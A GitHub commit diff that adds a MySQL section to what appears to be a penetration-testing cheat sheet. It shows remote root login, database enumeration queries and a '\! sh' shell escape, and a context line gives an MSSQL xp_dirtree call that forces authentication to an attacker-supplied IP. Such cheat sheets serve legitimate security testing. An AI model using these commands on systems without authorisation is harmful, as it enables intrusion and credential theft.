Update README.md

This commit is contained in:
Joe Totes
2022-10-26 12:04:20 -04:00
committed by GitHub
parent 789d8959d5
commit c42ab4f1c6

View File

@@ -598,6 +598,29 @@ sql> xp_dirtree "\\{IP ADDRESS}\test"
``` ```
## MYSQL [3306]
<br />
```bash
# MYSQL Remote Connect
mysql -h {RHOST} -u {root}
# Commands
sql> show databases;
sql> use {DATABASE};
sql> show tables;
sql> describe {TABLE};
sql> show columns from {TABLE};
sql> select version();
sql> select @@version();
sql> select user();
sql> select database();
#Get a shell with the mysql client user
\! sh
```
<br /> <br />